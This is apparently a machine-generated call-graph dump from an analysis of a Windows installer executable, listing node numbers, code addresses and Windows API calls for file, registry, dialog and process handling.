3682->3621 3683->3682 3684 40468b GetSysColor 3683->3684 3685 40468e 3683->3685 3684->3685 3686 404694 SetTextColor 3685->3686 3687 40469e SetBkMode 3685->3687 3686->3687 3688 4046b6 GetSysColor 3687->3688 3689 4046bc 3687->3689 3688->3689 3690 4046c3 SetBkColor 3689->3690 3691 4046cd 3689->3691 3690->3691 3691->3682 3692 4046e0 DeleteObject 3691->3692 3693 4046e7 CreateBrushIndirect 3691->3693 3692->3693 3693->3682 3695 4066ab 17 API calls 3694->3695 3696 4045d5 SetDlgItemTextW 3695->3696 3696->3613 3697->3654 3698->3659 3699->3661 3822 4016cc 3823 402da6 17 API calls 3822->3823 3824 4016d2 GetFullPathNameW 3823->3824 3825 4016ec 3824->3825 3831 40170e 3824->3831 3828 4069a4 2 API calls 3825->3828 3825->3831 3826 401723 GetShortPathNameW 3827 402c2a 3826->3827 3829 4016fe 3828->3829 3829->3831 3832 40666e lstrcpynW 3829->3832 3831->3826 3831->3827 3832->3831 3833 401e4e GetDC 3834 402d84 17 API calls 3833->3834 3835 401e60 GetDeviceCaps MulDiv ReleaseDC 3834->3835 3836 402d84 17 API calls 3835->3836 3837 401e91 3836->3837 3838 4066ab 17 API calls 3837->3838 3839 401ece CreateFontIndirectW 3838->3839 3840 402638 3839->3840 3841 402950 3842 402da6 17 API calls 3841->3842 3844 40295c 3842->3844 3843 402972 3846 406139 2 API calls 3843->3846 3844->3843 3845 402da6 17 API calls 3844->3845 3845->3843 3847 402978 3846->3847 3869 40615e GetFileAttributesW CreateFileW 3847->3869 3849 402985 3850 402a3b 3849->3850 3853 4029a0 GlobalAlloc 3849->3853 3854 402a23 3849->3854 3851 402a42 DeleteFileW 3850->3851 3852 402a55 3850->3852 3851->3852 3853->3854 3855 4029b9 3853->3855 3856 403377 40 API calls 3854->3856 3870 4035fe SetFilePointer 3855->3870 3858 402a30 CloseHandle 3856->3858 3858->3850 3859 4029bf 3860 4035e8 ReadFile 3859->3860 3861 4029c8 GlobalAlloc 3860->3861 3862 4029d8 3861->3862 3863 402a0c 3861->3863 3864 403377 40 API calls 3862->3864 3865 406210 WriteFile 3863->3865 3868 4029e5 3864->3868 3866 402a18 GlobalFree 3865->3866 3866->3854 3867 402a03 GlobalFree 3867->3863 3868->3867 3869->3849 3870->3859 3871 401956 3872 402da6 17 API calls 3871->3872 3873 40195d lstrlenW 3872->3873 3874 402638 3873->3874 3875 4014d7 3876 402d84 17 API calls 3875->3876 3877 4014dd Sleep 3876->3877 3879 402c2a 3877->3879 3880 4020d8 3881 40219c 3880->3881 3882 4020ea 3880->3882 3884 401423 24 API calls 3881->3884 3883 402da6 17 API calls 3882->3883 3885 4020f1 3883->3885 3890 4022f6 3884->3890 3886 402da6 17 API calls 3885->3886 3887 4020fa 3886->3887 3888 402110 LoadLibraryExW 3887->3888 3889 402102 GetModuleHandleW 3887->3889 3888->3881 3891 402121 3888->3891 3889->3888 3889->3891 3900 406aaa 3891->3900 3894 402132 3897 401423 24 API calls 3894->3897 3898 402142 3894->3898 3895 40216b 3896 4056d0 24 API calls 3895->3896 3896->3898 3897->3898 3898->3890 3899 40218e FreeLibrary 3898->3899 3899->3890 3905 406690 WideCharToMultiByte 3900->3905 3902 406ac7 3903 40212c 3902->3903 3904 406ace GetProcAddress 3902->3904 3903->3894 3903->3895 3904->3903 3905->3902 3906 402b59 3907 402b60 3906->3907 3908 402bab 3906->3908 3910 402ba9 3907->3910 3912 402d84 17 API calls 3907->3912 3909 406a3b 5 API calls 3908->3909 3911 402bb2 3909->3911 3913 402da6 17 API calls 3911->3913 3914 402b6e 3912->3914 3915 402bbb 3913->3915 3916 402d84 17 API calls 3914->3916 3915->3910 3917 402bbf IIDFromString 3915->3917 3919 402b7a 3916->3919 3917->3910 3918 402bce 3917->3918 3918->3910 3924 40666e lstrcpynW 3918->3924 3923 4065b5 wsprintfW 3919->3923 3921 402beb CoTaskMemFree 3921->3910 3923->3910 3924->3921 3925 402a5b 3926 402d84 17 API calls 3925->3926 3927 402a61 3926->3927 3928 402aa4 3927->3928 3929 402a88 3927->3929 3936 40292e 3927->3936 3930 402abe 3928->3930 3931 402aae 3928->3931 3932 402a8d 3929->3932 3933 402a9e 3929->3933 3935 4066ab 17 API calls 3930->3935 3934 402d84 17 API calls 3931->3934 3939 40666e lstrcpynW 3932->3939 3933->3936 3940 4065b5 wsprintfW 3933->3940 3934->3933 3935->3933 3939->3936 3940->3936 3941 403cdb 3942 403ce6 3941->3942 3943 403cea 3942->3943 3944 403ced GlobalAlloc 3942->3944 3944->3943 3713 40175c 3714 402da6 17 API calls 3713->3714 3715 401763 3714->3715 3716 40618d 2 API calls 3715->3716 3717 40176a 3716->3717 3718 40618d 2 API calls 3717->3718 3718->3717 3945 401d5d 3946 402d84 17 API calls 3945->3946 3947 401d6e SetWindowLongW 3946->3947 3948 402c2a 3947->3948 3949 4028de 3950 4028e6 3949->3950 3951 4028ea FindNextFileW 3950->3951 3953 4028fc 3950->3953 3952 402943 3951->3952 3951->3953 3955 40666e lstrcpynW 3952->3955 3955->3953 3956 401563 3957 402ba4 3956->3957 3960 4065b5 wsprintfW 3957->3960 3959 402ba9 3960->3959 3961 401968 3962 402d84 17 API calls 3961->3962 3963 40196f 3962->3963 3964 402d84 17 API calls 3963->3964 3965 40197c 3964->3965 3966 402da6 17 API calls 3965->3966 3967 401993 lstrlenW 3966->3967 3969 4019a4 3967->3969 3968 4019e5 3969->3968 3973 40666e lstrcpynW 3969->3973 3971 4019d5 3971->3968 3972 4019da lstrlenW 3971->3972 3972->3968 3973->3971 3974 40166a 3975 402da6 17 API calls 3974->3975 3976 401670 3975->3976 3977 4069a4 2 API calls 3976->3977 3978 401676 3977->3978 3979 402aeb 3980 402d84 17 API calls 3979->3980 3981 402af1 3980->3981 3982 40292e 3981->3982 3983 4066ab 17 API calls 3981->3983 3983->3982 3984 4026ec 3985 402d84 17 API calls 3984->3985 3986 4026fb 3985->3986 3987 402745 ReadFile 3986->3987 3988 4061e1 ReadFile 3986->3988 3989 402785 MultiByteToWideChar 3986->3989 3990 40283a 3986->3990 3993 4027ab SetFilePointer MultiByteToWideChar 3986->3993 3994 40284b 3986->3994 3996 402838 3986->3996 3997 40623f SetFilePointer 3986->3997 3987->3986 3987->3996 3988->3986 3989->3986 4006 4065b5 wsprintfW 3990->4006 3993->3986 3995 40286c SetFilePointer 3994->3995 3994->3996 3995->3996 3998 40625b 3997->3998 4003 406273 3997->4003 3999 4061e1 ReadFile 3998->3999 4000 406267 3999->4000 4001 4062a4 SetFilePointer 4000->4001 4002 40627c SetFilePointer 4000->4002 4000->4003 4001->4003 4002->4001 4004 406287 4002->4004 4003->3986 4005 406210 WriteFile 4004->4005 4005->4003 4006->3996 3719 40176f 3720 402da6 17 API calls 3719->3720 3721 401776 3720->3721 3722 401796 3721->3722 3723 40179e 3721->3723 3758 40666e lstrcpynW 3722->3758 3759 40666e lstrcpynW 3723->3759 3726 40179c 3730 4068f5 5 API calls 3726->3730 3727 4017a9 3728 405f3d 3 API calls 3727->3728 3729 4017af lstrcatW 3728->3729 3729->3726 3746 4017bb 3730->3746 3731 4069a4 2 API calls 3731->3746 3732 406139 2 API calls 3732->3746 3734 4017cd CompareFileTime 3734->3746 3735 40188d 3737 4056d0 24 API calls 3735->3737 3736 401864 3738 4056d0 24 API calls 3736->3738 3747 401879 3736->3747 3740 401897 3737->3740 3738->3747 3739 40666e lstrcpynW 3739->3746 3741 403377 40 API calls 3740->3741 3742 4018aa 3741->3742 3743 4018be SetFileTime 3742->3743 3745 4018d0 CloseHandle 3742->3745 3743->3745 3744 4066ab 17 API calls 3744->3746 3745->3747 3748 4018e1 3745->3748 3746->3731 3746->3732 3746->3734 3746->3735 3746->3736 3746->3739 3746->3744 3754 405cce MessageBoxIndirectW 3746->3754 3757 40615e GetFileAttributesW CreateFileW 3746->3757 3749 4018e6 3748->3749 3750 4018f9 3748->3750 3752 4066ab 17 API calls 3749->3752 3751 4066ab 17 API calls 3750->3751 3753 401901 3751->3753 3755 4018ee lstrcatW 3752->3755 3756 405cce MessageBoxIndirectW 3753->3756 3754->3746 3755->3753 3756->3747 3757->3746 3758->3726 3759->3727 4007 401a72 4008 402d84 17 API calls 4007->4008 4009 401a7b 4008->4009 4010 402d84 17 API calls 4009->4010 4011 401a20 4010->4011 4012 401573 4013 401583 ShowWindow 4012->4013 4014 40158c 4012->4014 4013->4014 4015 402c2a 4014->4015 4016 40159a ShowWindow 4014->4016 4016->4015 4017 404a74 4018 404a84 4017->4018 4019 404aaa 4017->4019 4020 4045ca 18 API calls 4018->4020 4021 404631 8 API calls 4019->4021 4022 404a91 SetDlgItemTextW 4020->4022 4023 404ab6 4021->4023 4022->4019 4024 4023f4 4025 402da6 17 API calls 4024->4025 4026 402403 4025->4026 4027 402da6 17 API calls 4026->4027 4028 40240c 4027->4028 4029 402da6 17 API calls 4028->4029 4030 402416 GetPrivateProfileStringW 4029->4030 4031 4014f5 SetForegroundWindow 4032 402c2a 4031->4032 4033 401ff6 4034 402da6 17 API calls 4033->4034 4035 401ffd 4034->4035 4036 4069a4 2 API calls 4035->4036 4037 402003 4036->4037 4039 402014 4037->4039 4040 4065b5 wsprintfW 4037->4040 4040->4039 4041 401b77 4042 402da6 17 API calls 4041->4042 4043 401b7e 4042->4043 4044 402d84 17 API calls 4043->4044 4045 401b87 wsprintfW 4044->4045 4046 402c2a 4045->4046 4047 40167b 4048 402da6 17 API calls 4047->4048 4049 401682 4048->4049 4050 402da6 17 API calls 4049->4050 4051 40168b 4050->4051 4052 402da6 17 API calls 4051->4052 4053 401694 MoveFileW 4052->4053 4054 4016a7 4053->4054 4060 4016a0 4053->4060 4055 4069a4 2 API calls 4054->4055 4056 4022f6 4054->4056 4058 4016b6 4055->4058 4057 401423 24 API calls 4057->4056 4058->4056 4059 40642e 36 API calls 4058->4059 4059->4060 4060->4057 4061 4019ff 4062 402da6 17 API calls 4061->4062 4063 401a06 4062->4063 4064 402da6 17 API calls 4063->4064 4065 401a0f 4064->4065 4066 401a16 lstrcmpiW 4065->4066 4067 401a28 lstrcmpW 4065->4067 4068 401a1c 4066->4068 4067->4068 4069 4022ff 4070 402da6 17 API calls 4069->4070 4071 402305 4070->4071 4072 402da6 17 API calls 4071->4072 4073 40230e 4072->4073 4074 402da6 17 API calls 4073->4074 4075 402317 4074->4075 4076 4069a4 2 API calls 4075->4076 4077 402320 4076->4077 4078 402331 lstrlenW lstrlenW 4077->4078 4079 402324 4077->4079 4081 4056d0 24 API calls 4078->4081 4080 4056d0 24 API calls 4079->4080 4083 40232c 4079->4083 4080->4083 4082 40236f SHFileOperationW 4081->4082 4082->4079 4082->4083 4084 401000 4085 401037 BeginPaint GetClientRect 4084->4085 4086 40100c DefWindowProcW 4084->4086 4087 4010f3 4085->4087 4091 401179 4086->4091 4089 401073 CreateBrushIndirect FillRect DeleteObject 4087->4089 4090 4010fc 4087->4090 4089->4087 4092 401102 CreateFontIndirectW 4090->4092 4093 401167 EndPaint 4090->4093 4092->4093 4094 401112 6 API calls 4092->4094 4093->4091 4094->4093 4095 404700 lstrcpynW lstrlenW 4096 401d81 4097 401d94 GetDlgItem 4096->4097 4098 401d87 4096->4098 4100 401d8e 4097->4100 4099 402d84 17 API calls 4098->4099 4099->4100 4101 401dd5 GetClientRect LoadImageW SendMessageW 4100->4101 4102 402da6 17 API calls 4100->4102 4104 401e33 4101->4104 4106 401e3f 4101->4106 4102->4101 4105 401e38 DeleteObject 4104->4105 4104->4106 4105->4106 4107 401503 4108 40150b 4107->4108 4110 40151e 4107->4110 4109 402d84 17 API calls 4108->4109 4109->4110 4111 402383 4112 40238a 4111->4112 4114 40239d 4111->4114 4113 4066ab 17 API calls 4112->4113 4115 402397 4113->4115 4116 405cce MessageBoxIndirectW 4115->4116 4116->4114 4117 402c05 SendMessageW 4118 402c1f InvalidateRect 4117->4118 4119 402c2a 4117->4119 4118->4119 4120 404789 4122 4047a1 4120->4122 4128 4048bb 4120->4128 4121 404925 4123 4049ef 4121->4123 4124 40492f GetDlgItem 4121->4124 4125 4045ca 18 API calls 4122->4125 4131 404631 8 API calls 4123->4131 4126 4049b0 4124->4126 4127 404949 4124->4127 4130 404808 4125->4130 4126->4123 4135 4049c2 4126->4135 4127->4126 4134 40496f SendMessageW LoadCursorW SetCursor 4127->4134 4128->4121 4128->4123 4129 4048f6 GetDlgItem SendMessageW 4128->4129 4153 4045ec EnableWindow 4129->4153 4133 4045ca 18 API calls 4130->4133 4141 4049ea 4131->4141 4137 404815 CheckDlgButton 4133->4137 4157 404a38 4134->4157 4139 4049d8 4135->4139 4140 4049c8 SendMessageW 4135->4140 4136 404920 4154 404a14 4136->4154 4151 4045ec EnableWindow 4137->4151 4139->4141 4142 4049de SendMessageW 4139->4142 4140->4139 4142->4141 4146 404833 GetDlgItem 4152 4045ff SendMessageW 4146->4152 4148 404849 SendMessageW 4149 404866 GetSysColor 4148->4149 4150 40486f SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4148->4150 4149->4150 4150->4141 4151->4146 4152->4148 4153->4136 4155 404a22 4154->4155 4156 404a27 SendMessageW 4154->4156 4155->4156 4156->4121 4160 405c94 ShellExecuteExW 4157->4160 4159 40499e LoadCursorW SetCursor 4159->4126 4160->4159 4161 40248a 4162 402da6 17 API calls 4161->4162 4163 40249c 4162->4163 4164 402da6 17 API calls 4163->4164 4165 4024a6 4164->4165 4178 402e36 4165->4178 4168 4024de 4170 4024ea 4168->4170 4173 402d84 17 API calls 4168->4173 4169 402da6 17 API calls 4172 4024d4 lstrlenW 4169->4172 4174 402509 RegSetValueExW 4170->4174 4175 403377 40 API calls 4170->4175 4171 40292e 4172->4168 4173->4170 4176 40251f RegCloseKey 4174->4176 4175->4174 4176->4171 4179 402e51 4178->4179 4182 406509 4179->4182 4183 406518 4182->4183 4184 406523 RegCreateKeyExW 4183->4184 4185 4024b6 4183->4185 4184->4185 4185->4168 4185->4169 4185->4171 4186 40290b 4187 402da6 17 API calls 4186->4187 4188 402912 FindFirstFileW 4187->4188 4189 40293a 4188->4189 4193 402925 4188->4193 4194 4065b5 wsprintfW 4189->4194 4191 402943 4195 40666e lstrcpynW 4191->4195 4194->4191 4195->4193 4196 40190c 4197 401943 4196->4197 4198 402da6 17 API calls 4197->4198 4199 401948 4198->4199 4200 405d7a 67 API calls 4199->4200 4201 401951 4200->4201 4202 40190f 4203 402da6 17 API calls 4202->4203 4204 401916 4203->4204 4205 405cce MessageBoxIndirectW 4204->4205 4206 40191f 4205->4206 4207 40580f 4208 405830 GetDlgItem GetDlgItem GetDlgItem 4207->4208 4209 4059b9 4207->4209 4252 4045ff SendMessageW 4208->4252 4211 4059c2 GetDlgItem CreateThread CloseHandle 4209->4211 4212 4059ea 4209->4212 4211->4212 4214 405a01 ShowWindow ShowWindow 4212->4214 4215 405a3a 4212->4215 4216 405a15 4212->4216 4213 4058a0 4218 4058a7 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4213->4218 4254 4045ff SendMessageW 4214->4254 4222 404631 8 API calls 4215->4222 4217 405a75 4216->4217 4220 405a29 4216->4220 4221 405a4f ShowWindow 4216->4221 4217->4215 4227 405a83 SendMessageW 4217->4227 4225 405915 4218->4225 4226 4058f9 SendMessageW SendMessageW 4218->4226 4228 4045a3 SendMessageW 4220->4228 4223 405a61 4221->4223 4224 405a6f 4221->4224 4229 405a48 4222->4229 4230 4056d0 24 API calls 4223->4230 4231 4045a3 SendMessageW 4224->4231 4232 405928 4225->4232 4233 40591a SendMessageW 4225->4233 4226->4225 4227->4229 4234 405a9c CreatePopupMenu 4227->4234 4228->4215 4230->4224 4231->4217 4236 4045ca 18 API calls 4232->4236 4233->4232 4235 4066ab 17 API calls 4234->4235 4237 405aac AppendMenuW 4235->4237 4238 405938 4236->4238 4239 405ac9 GetWindowRect 4237->4239 4240 405adc TrackPopupMenu 4237->4240 4241 405941 ShowWindow 4238->4241 4242 405975 GetDlgItem SendMessageW 4238->4242 4239->4240 4240->4229 4244 405af7 4240->4244 4245 405964 4241->4245 4246 405957 ShowWindow 4241->4246 4242->4229 4243 40599c SendMessageW SendMessageW 4242->4243 4243->4229 4247 405b13 SendMessageW 4244->4247 4253 4045ff SendMessageW 4245->4253 4246->4245 4247->4247 4249 405b30 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4247->4249 4250 405b55 SendMessageW 4249->4250 4250->4250 4251 405b7e GlobalUnlock SetClipboardData CloseClipboard 4250->4251 4251->4229 4252->4213 4253->4242 4254->4216 4255 404e11 4256 404e21 4255->4256 4257 404e3d 4255->4257 4266 405cb2 GetDlgItemTextW 4256->4266 4259 404e70 4257->4259 4260 404e43 SHGetPathFromIDListW 4257->4260 4262 404e5a SendMessageW 4260->4262 4263 404e53 4260->4263 4261 404e2e SendMessageW 4261->4257 4262->4259 4265 40140b 2 API calls 4263->4265 4265->4262 4266->4261 4267 401491 4268 4056d0 24 API calls 4267->4268 4269 401498 4268->4269 4270 402891 4271 402898 4270->4271 4273 402ba9 4270->4273 4272 402d84 17 API calls 4271->4272 4274 40289f 4272->4274 4275 4028ae SetFilePointer 4274->4275 4275->4273 4276 4028be 4275->4276 4278 4065b5 wsprintfW 4276->4278 4278->4273 4279 401f12 4280 402da6 17 API calls 4279->4280 4281 401f18 4280->4281 4282 402da6 17 API calls 4281->4282 4283 401f21 4282->4283 4284 402da6 17 API calls 4283->4284 4285 401f2a 4284->4285 4286 402da6 17 API calls 4285->4286 4287 401f33 4286->4287 4288 401423 24 API calls 4287->4288 4289 401f3a 4288->4289 4296 405c94 ShellExecuteExW 4289->4296 4291 401f82 4292 406ae6 5 API calls 4291->4292 4294 40292e 4291->4294 4293 401f9f CloseHandle 4292->4293 4293->4294 4296->4291 4297 402f93 4298 402fa5 SetTimer 4297->4298 4299 402fbe 4297->4299 4298->4299 4300 40300c 4299->4300 4301 403012 MulDiv 4299->4301 4302 402fcc wsprintfW SetWindowTextW SetDlgItemTextW 4301->4302 4302->4300 4304 401d17 4305 402d84 17 API calls 4304->4305 4306 401d1d IsWindow 4305->4306 4307 401a20 4306->4307 4308 401b9b 4309 401ba8 4308->4309 4310 401bec 4308->4310 4313 401c31 4309->4313 4318 401bbf 4309->4318 4311 401bf1 4310->4311 4312 401c16 GlobalAlloc 4310->4312 4323 40239d 4311->4323 4329 40666e lstrcpynW 4311->4329 4315 4066ab 17 API calls 4312->4315 4314 4066ab 17 API calls 4313->4314 4313->4323 4317 402397 4314->4317 4315->4313 4321 405cce MessageBoxIndirectW 4317->4321 4327 40666e lstrcpynW 4318->4327 4319 401c03 GlobalFree 4319->4323 4321->4323 4322 401bce 4328 40666e lstrcpynW 4322->4328 4325 401bdd 4330 40666e lstrcpynW 4325->4330 4327->4322 4328->4325 4329->4319 4330->4323 4331 40261c 4332 402da6 17 API calls 4331->4332 4333 402623 4332->4333 4336 40615e GetFileAttributesW CreateFileW 4333->4336 4335 40262f 4336->4335 4337 40149e 4338 4014ac PostQuitMessage 4337->4338 4339 40239d 4337->4339 4338->4339 4340 40259e 4350 402de6 4340->4350 4343 402d84 17 API calls 4344 4025b1 4343->4344 4345 4025d9 RegEnumValueW 4344->4345 4346 4025cd RegEnumKeyW 4344->4346 4348 40292e 4344->4348 4347 4025ee RegCloseKey 4345->4347 4346->4347 4347->4348 4351 402da6 17 API calls 4350->4351 4352 402dfd 4351->4352 4353 4064db RegOpenKeyExW 4352->4353 4354 4025a8 4353->4354 4354->4343 4355 4015a3 4356 402da6 17 API calls 4355->4356 4357 4015aa SetFileAttributesW 4356->4357 4358 4015bc 4357->4358 3288 401fa4 3289 402da6 17 API calls 3288->3289 3290 401faa 3289->3290 3291 4056d0 24 API calls 3290->3291 3292 401fb4 3291->3292 3303 405c51 CreateProcessW 3292->3303 3295 401fdd CloseHandle 3298 40292e 3295->3298 3299 401fcf 3300 401fd4 3299->3300 3301 401fdf 3299->3301 3311 4065b5 wsprintfW 3300->3311 3301->3295 3304 401fba 3303->3304 3305 405c84 CloseHandle 3303->3305 3304->3295 3304->3298 3306 406ae6 WaitForSingleObject 3304->3306 3305->3304 3307 406b00 3306->3307 3308 406b12 GetExitCodeProcess 3307->3308 3312 406a77 3307->3312 3308->3299 3311->3295 3313 406a94 PeekMessageW 3312->3313 3314 406aa4 WaitForSingleObject 3313->3314 3315 406a8a DispatchMessageW 3313->3315 3314->3307 3315->3313 4359 40202a 4360 402da6 17 API calls 4359->4360 4361 402031 4360->4361 4362 406a3b 5 API calls 4361->4362 4363 402040 4362->4363 4364 4020cc 4363->4364 4365 40205c GlobalAlloc 4363->4365 4365->4364 4366 402070 4365->4366 4367 406a3b 5 API calls 4366->4367 4368 402077 4367->4368 4369 406a3b 5 API calls 4368->4369 4370 402081 4369->4370 4370->4364 4374 4065b5 wsprintfW 4370->4374 4372 4020ba 4375 4065b5 wsprintfW 4372->4375 4374->4372 4375->4364 4376 40252a 4377 402de6 17 API calls 4376->4377 4378 402534 4377->4378 4379 402da6 17 API calls 4378->4379 4380 40253d 4379->4380 4381 402548 RegQueryValueExW 4380->4381 4382 40292e 4380->4382 4383 402568 4381->4383 4386 40256e RegCloseKey 4381->4386 4383->4386 4387 4065b5 wsprintfW 4383->4387 4386->4382 4387->4386 4388 4021aa 4389 402da6 17 API calls 4388->4389 4390 4021b1 4389->4390 4391 402da6 17 API calls 4390->4391 4392 4021bb 4391->4392 4393 402da6 17 API calls 4392->4393 4394 4021c5 4393->4394 4395 402da6 17 API calls 4394->4395 4396 4021cf 4395->4396 4397 402da6 17 API calls 4396->4397 4398 4021d9 4397->4398 4399 402218 CoCreateInstance 4398->4399 4400 402da6 17 API calls 4398->4400 4403 402237 4399->4403 4400->4399 4401 401423 24 API calls 4402 4022f6 4401->4402 4403->4401 4403->4402 3700 403c2b 3701 403c46 3700->3701 3702 403c3c CloseHandle 3700->3702 3703 403c50 CloseHandle 3701->3703 3704 403c5a 3701->3704 3702->3701 3703->3704 3709 403c88 3704->3709 3707 405d7a 67 API calls 3708 403c6b 3707->3708 3710 403c96 3709->3710 3711 403c5f 3710->3711 3712 403c9b FreeLibrary GlobalFree 3710->3712 3711->3707 3712->3711 3712->3712 4404 401a30 4405 402da6 17 API calls 4404->4405 4406 401a39 ExpandEnvironmentStringsW 4405->4406 4407 401a4d 4406->4407 4409 401a60 4406->4409 4408 401a52 lstrcmpW 4407->4408 4407->4409 4408->4409 4415 4023b2 4416 4023c0 4415->4416 4417 4023ba 4415->4417 4419 4023ce 4416->4419 4420 402da6 17 API calls 4416->4420 4418 402da6 17 API calls 4417->4418 4418->4416 4421 4023dc 4419->4421 4423 402da6 17 API calls 4419->4423 4420->4419 4422 402da6 17 API calls 4421->4422 4424 4023e5 WritePrivateProfileStringW 4422->4424 4423->4421 4425 402434 4426 402467 4425->4426 4427 40243c 4425->4427 4429 402da6 17 API calls 4426->4429 4428 402de6 17 API calls 4427->4428 4430 402443 4428->4430 4431 40246e 4429->4431 4433 40247b 4430->4433 4434 402da6 17 API calls 4430->4434 4436 402e64 4431->4436 4435 402454 RegDeleteValueW RegCloseKey 4434->4435 4435->4433 4437 402e78 4436->4437 4439 402e71 4436->4439 4437->4439 4440 402ea9 4437->4440 4439->4433 4441 4064db RegOpenKeyExW 4440->4441 4442 402ed7 4441->4442 4443 402f81 4442->4443 4444 402ee7 RegEnumValueW 4442->4444 4448 402f0a 4442->4448 4443->4439 4445 402f71 RegCloseKey 4444->4445 4444->4448 4445->4443 4446 402f46 RegEnumKeyW 4447 402f4f RegCloseKey 4446->4447 4446->4448 4449 406a3b 5 API calls 4447->4449 4448->4445 4448->4446 4448->4447 4450 402ea9 6 API calls 4448->4450 4451 402f5f 4449->4451 4450->4448 4451->4443 4452 402f63 RegDeleteKeyW 4451->4452 4452->4443 4453 401735 4454 402da6 17 API calls 4453->4454 4455 40173c SearchPathW 4454->4455 4456 401757 4455->4456 4457 405037 GetDlgItem GetDlgItem 4458 405089 7 API calls 4457->4458 4469 4052ae 4457->4469 4459 405130 DeleteObject 4458->4459 4460 405123 SendMessageW 4458->4460 4461 405139 4459->4461 4460->4459 4463 405170 4461->4463 4464 4066ab 17 API calls 4461->4464 4462 405390 4466 40543c 4462->4466 4476 4053e9 SendMessageW 4462->4476 4500 4052a1 4462->4500 4465 4045ca 18 API calls 4463->4465 4470 405152 SendMessageW SendMessageW 4464->4470 4471 405184 4465->4471 4467 405446 SendMessageW 4466->4467 4468 40544e 4466->4468 4467->4468 4478 405460 ImageList_Destroy 4468->4478 4479 405467 4468->4479 4492 405477 4468->4492 4469->4462 4474 404f85 5 API calls 4469->4474 4491 40531d 4469->4491 4470->4461 4475 4045ca 18 API calls 4471->4475 4472 405382 SendMessageW 4472->4462 4473 404631 8 API calls 4477 40563d 4473->4477 4474->4491 4489 405195 4475->4489 4481 4053fe SendMessageW 4476->4481 4476->4500 4478->4479 4482 405470 GlobalFree 4479->4482 4479->4492 4480 4055f1 4485 405603 ShowWindow GetDlgItem ShowWindow 4480->4485 4480->4500 4484 405411 4481->4484 4482->4492 4483 405270 GetWindowLongW SetWindowLongW 4486 405289 4483->4486 4493 405422 SendMessageW 4484->4493 4485->4500 4487 4052a6 4486->4487 4488 40528e ShowWindow 4486->4488 4510 4045ff SendMessageW 4487->4510 4509 4045ff SendMessageW 4488->4509 4489->4483 4490 4051e8 SendMessageW 4489->4490 4494 40526b 4489->4494 4497 405226 SendMessageW 4489->4497 4498 40523a SendMessageW 4489->4498 4490->4489 4491->4462 4491->4472 4492->4480 4499 405005 4 API calls 4492->4499 4504 4054b2 4492->4504 4493->4466 4494->4483 4494->4486 4497->4489 4498->4489 4499->4504 4500->4473 4501 4055bc 4502 4055c7 InvalidateRect 4501->4502 4505 4055d3 4501->4505 4502->4505 4503 4054e0 SendMessageW 4508 4054f6 4503->4508 4504->4503 4504->4508 4505->4480 4511 404f40 4505->4511 4507 40556a SendMessageW SendMessageW 4507->4508 4508->4501 4508->4507 4509->4500 4510->4469 4514 404e77 4511->4514 4513 404f55 4513->4480 4515 404e90 4514->4515 4516 4066ab 17 API calls 4515->4516 4517 404ef4 4516->4517 4518 4066ab 17 API calls 4517->4518 4519 404eff 4518->4519 4520 4066ab 17 API calls 4519->4520 4521 404f15 lstrlenW wsprintfW SetDlgItemTextW 4520->4521 4521->4513 4522 401d38 4523 402d84 17 API calls 4522->4523 4524 401d3f 4523->4524 4525 402d84 17 API calls 4524->4525 4526 401d4b GetDlgItem 4525->4526 4527 402638 4526->4527 4528 4014b8 4529 4014be 4528->4529 4530 401389 2 API calls 4529->4530 4531 4014c6 4530->4531 4532 40473a lstrlenW 4533 404759 4532->4533 4534 40475b WideCharToMultiByte 4532->4534 4533->4534 4535 404abb 4536 404ae7 4535->4536 4537 404af8 4535->4537 4596 405cb2 GetDlgItemTextW 4536->4596 4539 404b04 GetDlgItem 4537->4539 4545 404b63 4537->4545 4542 404b18 4539->4542 4540 404c47 4546 404df6 4540->4546 4598 405cb2 GetDlgItemTextW 4540->4598 4541 404af2 4543 4068f5 5 API calls 4541->4543 4544 404b2c SetWindowTextW 4542->4544 4549 405fe8 4 API calls 4542->4549 4543->4537 4550 4045ca 18 API calls 4544->4550 4545->4540 4545->4546 4551 4066ab 17 API calls 4545->4551 4548 404631 8 API calls 4546->4548 4553 404e0a 4548->4553 4554 404b22 4549->4554 4555 404b48 4550->4555 4556 404bd7 SHBrowseForFolderW 4551->4556 4552 404c77 4557 406045 18 API calls 4552->4557 4554->4544 4561 405f3d 3 API calls 4554->4561 4558 4045ca 18 API calls 4555->4558 4556->4540 4559 404bef CoTaskMemFree 4556->4559 4560 404c7d 4557->4560 4562 404b56 4558->4562 4563 405f3d 3 API calls 4559->4563 4599 40666e lstrcpynW 4560->4599 4561->4544 4597 4045ff SendMessageW 4562->4597 4565 404bfc 4563->4565 4568 404c33 SetDlgItemTextW 4565->4568 4572 4066ab 17 API calls 4565->4572 4567 404b5c 4570 406a3b 5 API calls 4567->4570 4568->4540 4569 404c94 4571 406a3b 5 API calls 4569->4571 4570->4545 4578 404c9b 4571->4578 4574 404c1b lstrcmpiW 4572->4574 4573 404cdc 4600 40666e lstrcpynW 4573->4600 4574->4568 4575 404c2c lstrcatW 4574->4575 4575->4568 4577 404ce3 4579 405fe8 4 API calls 4577->4579 4578->4573 4583 405f89 2 API calls 4578->4583 4584 404d34 4578->4584 4580 404ce9 GetDiskFreeSpaceW 4579->4580 4582 404d0d MulDiv 4580->4582 4580->4584 4582->4584 4583->4578 4585 404da5 4584->4585 4587 404f40 20 API calls 4584->4587 4586 404dc8 4585->4586 4588 40140b 2 API calls 4585->4588 4601 4045ec EnableWindow 4586->4601 4589 404d92 4587->4589 4588->4586 4591 404da7 SetDlgItemTextW 4589->4591 4592 404d97 4589->4592 4591->4585 4594 404e77 20 API calls 4592->4594 4593 404de4 4593->4546 4595 404a14 SendMessageW 4593->4595 4594->4585 4595->4546 4596->4541 4597->4567 4598->4552 4599->4569 4600->4577 4601->4593 4602 40263e 4603 402652 4602->4603 4604 40266d 4602->4604 4605 402d84 17 API calls 4603->4605 4606 402672 4604->4606 4607 40269d 4604->4607 4613 402659 4605->4613 4608 402da6 17 API calls 4606->4608 4609 402da6 17 API calls 4607->4609 4610 402679 4608->4610 4611 4026a4 lstrlenW 4609->4611 4619 406690 WideCharToMultiByte 4610->4619 4611->4613 4616 40623f 5 API calls 4613->4616 4617 4026e7 4613->4617 4618 4026d1 4613->4618 4614 40268d lstrlenA 4614->4613 4615 406210 WriteFile 4615->4617 4616->4618 4618->4615 4618->4617 4619->4614

                                                        Executed Functions

